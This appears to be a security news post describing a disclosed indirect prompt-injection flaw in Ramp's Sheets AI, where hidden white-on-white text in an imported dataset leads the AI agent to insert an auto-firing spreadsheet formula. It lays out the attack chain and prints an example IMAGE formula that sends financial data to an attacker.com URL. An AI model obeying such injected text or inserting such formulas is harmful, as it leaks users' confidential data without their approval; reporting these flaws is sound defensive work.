Here’s a scenario that should make every finance manager sweat: you import a seemingly innocent industry dataset into your company spreadsheet, ask the AI assistant to analyse it, and the AI quietly inserts a formula that sends your confidential financial data to an attacker’s server. No approval needed. No warning. Just gone.
That’s exactly what security researchers at PromptArmor found in Ramp’s Sheets AI. And it’s not theoretical — it works reliably.
The Attack Chain
The vulnerability exploits indirect prompt injection, hidden in data you’d reasonably import:
- You open a workbook containing your company’s confidential financial model
- You import an external dataset — industry benchmarks from a website, email, or shared drive
- The dataset contains a concealed prompt injection — white-on-white text that manipulates the AI
- You ask Ramp AI to compare your model against the imported statistics
- The AI falls for the injection and builds a formula like
=IMAGE("https://attacker.com/visualize.png?{your_sensitive_financial_data}") - The formula fires automatically — your data is exfiltrated to the attacker’s server
The critical failure: Ramp’s AI inserted the malicious formula without requiring any user approval. The agent just… did it.
Not the First Time
This is alarmingly similar to the CellShock vulnerability PromptArmor found in Claude for Excel. Same attack class, different product. The pattern is clear: AI agents with write access to spreadsheets and no approval gates are a security liability.
Ramp’s security team confirmed the issue was resolved on March 16, 2026, following responsible disclosure. Credit to them for that. But the underlying problem — AI agents executing actions without human approval — isn’t going away.

NZ businesses are racing to deploy AI agents across finance, operations, and customer service. The appeal is obvious: automate the tedious stuff. But every agent with write access to your systems is also a potential exfiltration vector.
